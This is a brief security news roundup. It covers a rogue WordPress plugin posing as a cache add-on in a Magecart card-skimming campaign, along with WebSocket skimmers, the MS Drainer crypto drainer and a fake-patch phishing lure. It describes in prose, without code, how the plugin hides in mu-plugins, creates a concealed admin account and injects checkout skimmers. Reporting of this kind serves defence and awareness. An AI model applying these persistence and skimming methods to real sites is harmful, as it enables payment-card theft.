A dangerous rogue WordPress plugin has been discovered by security researchers, which is part of a Magecart campaign targeting e-commerce websites [1] [2] [4]. This plugin disguises itself as a legitimate WordPress Cache Addons plugin and gains access to WordPress sites through compromised admin users or security flaws in other installed plugins [4].
Description
Once installed, the plugin replicates itself to the mu-plugins directory [2] [4], enabling itself and hiding from the admin panel [4]. It also has the ability to create and hide an administrator user account [4], ensuring continued access to the target site. The main objective of this campaign is to steal credit card information by injecting credit card stealing malware into checkout pages and sending the stolen information to a domain controlled by the attacker.
In addition to this discovery, another Magecart campaign has been found that utilizes the WebSocket communications protocol to insert skimmer code on online storefronts [4]. This skimming activity involves the theft, re-sale [4], and misuse of credit card data [4], posing a significant threat to online security. Europol has already notified 443 online merchants of compromised customer data [4], while Group-IB has detected and identified 23 families of JS-sniffers used in attacks against companies in 17 different countries [4].
Furthermore, recent reports have surfaced regarding bogus ads on Google Search and Twitter promoting a cryptocurrency drainer called MS Drainer. This malicious software has already stolen millions of dollars from thousands of victims. These reports follow a warning about a phishing campaign that tricks users into installing a plugin disguised as a patch [4], leveraging the “RESERVED” status associated with a CVE identifier [4].
Conclusion
These discoveries highlight the ongoing vulnerability of popular content management systems [5], like WordPress [1] [2] [3] [4] [5], and emphasize the need for robust security measures. The increasing sophistication of these attacks underscores the ongoing risks faced by e-commerce websites and the importance of implementing comprehensive security strategies to protect against them. It is crucial for organizations to remain vigilant and stay updated on the latest threats in order to mitigate potential damages and safeguard customer data in the future.
References
[1] https://www.ihash.eu/2023/12/rogue-wordpress-plugin-exposes-e-commerce-sites-to-credit-card-theft/
[2] https://windows8.myblog.it/2023/12/22/risk-alert-rogue-wordpress-plugin-endangers-e-commerce-credit-card-data/
[3] https://allinfosecnews.com/item/magecart-wordpress-plugin-injects-malicious-user-credit-card-skimmer-2023-12-21/
[4] https://thehackernews.com/2023/12/rogue-wordpress-plugin-exposes-e.html
[5] https://bragg.substack.com/p/daily-drop-672-houthi-attacks-magecart